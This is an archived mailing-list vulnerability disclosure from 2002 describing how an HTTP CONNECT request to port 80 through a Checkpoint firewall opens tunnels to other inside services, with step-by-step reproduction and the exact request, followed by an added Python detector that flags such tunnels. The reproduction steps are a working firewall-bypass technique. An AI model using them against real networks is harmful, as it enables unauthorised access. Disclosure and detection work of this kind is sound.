Checkpoint bounced my mail because I'm not a Checkpoint customer, so I contacted customer advocacy and resent it to a different address (this message is copied to her as well). I was told that the issue would be propagated to an appropriate person. Please drop the old message and continue to hold this message until Checkpoint responds.

I have a few updates to this issue that I have learned since I crafted the original message. I only need to give the "CONNECT" line, and nothing else. After the second newline there is a pause and then the TCP stream is open. I seem to be able to open any port on any machine I want *except* port 80. I was able to telnet in to UNIX login with the firewall appearing as the remote host. The initial machine I use (inside the firewall) does not need to actually exist; I merely have to attempt to connect to an IP address "inside" on port 80. This gives anyone outside a firewall the ability to masquerade on any TCP service (except WWW) as a machine inside the domain of the firewall. As far as I can tell there are no logs on this, and it is hard to detect on the firewall.

I found it by doing a tcpdump of all packets and gradually narrowing down my filters until I was able to "catch" an entire transaction.

----- Forwarded message from "William D. Colburn (aka Schlake)" <wcolburnat_private> -----

Step one: telnet to a machine behind the Checkpoint firewall on port 80

Step two: Type the following:

>CONNECT mailserver.somecompany.com:25 / HTTP/1.0
>User-Agent: eeep
>Cache-Control: private,no-cache
>Pragma: no-cache
>

Step three: wait a moment for your SMTP banner to pop up.

I will attach an actual attack I captured with tcpdump and ethereal. The file is the result of an ethereal "Follow TCP stream".

I hate the person who did this to me and I hope they die a terrible death.

--
William Colburn, "Sysprog" <wcolburnat_private>
Computer Center, New Mexico Institute of Mining and Technology
http://www.nmt.edu/tcc/ http://www.nmt.edu/~wcolburn
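A defender-side check, added here as an example and not part of the original post or of any Checkpoint product: it parses a captured client-to-firewall stream of the shape quoted above and flags any CONNECT whose target port is outside an HTTPS-only allowlist, which is the pattern a reviewer of "Follow TCP stream" output would want to alert on. The sample stream, the host name and the allowlist are constructed.

```python
import re
from typing import Optional

# Constructed sample modelled on the request quoted in the post, as it would
# appear in an ethereal "Follow TCP stream" dump. The host is a placeholder and
# the trailing "220" line stands in for the SMTP banner that comes back.
CAPTURED_STREAM = (
    "CONNECT mailserver.somecompany.com:25 / HTTP/1.0\r\n"
    "User-Agent: eeep\r\n"
    "Cache-Control: private,no-cache\r\n"
    "Pragma: no-cache\r\n"
    "\r\n"
    "220 mailserver.somecompany.com ESMTP\r\n"
)

# A CONNECT request line is "CONNECT host:port HTTP/x.y"; the captured one
# carries an extra "/" token, so only the host:port target is anchored here.
CONNECT_LINE = re.compile(r"^CONNECT\s+(?P<host>[^\s:/]+):(?P<port>\d{1,5})(?:\s|$)")


def parse_connect(stream: str) -> Optional[tuple[str, int]]:
    """Return (host, port) when the stream opens with a well-formed CONNECT."""
    first_line = stream.splitlines()[0] if stream else ""
    m = CONNECT_LINE.match(first_line)
    if m is None:
        return None
    port = int(m.group("port"))
    if not 0 < port <= 65535:
        return None  # malformed port, not a usable tunnel request
    return m.group("host"), port


def assess_connect(stream: str, allowed_ports: frozenset = frozenset({443})) -> str:
    """Classify a captured stream for a reviewer.

    Hypothetical policy: tunnelling through the HTTP proxy is legitimate only
    to the ports in allowed_ports (HTTPS by default). Any other target port is
    the masquerade pattern the post describes and should raise an alert.
    """
    parsed = parse_connect(stream)
    if parsed is None:
        return "not-connect"
    host, port = parsed
    if port in allowed_ports:
        return f"allowed: CONNECT {host}:{port}"
    return f"alert: CONNECT tunnel to {host}:{port} (port not in allowlist)"


if __name__ == "__main__":
    print(assess_connect(CAPTURED_STREAM))
```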
This archive was generated by hypermail 2b30 : Tue Feb 19 2002 - 15:50:37 PST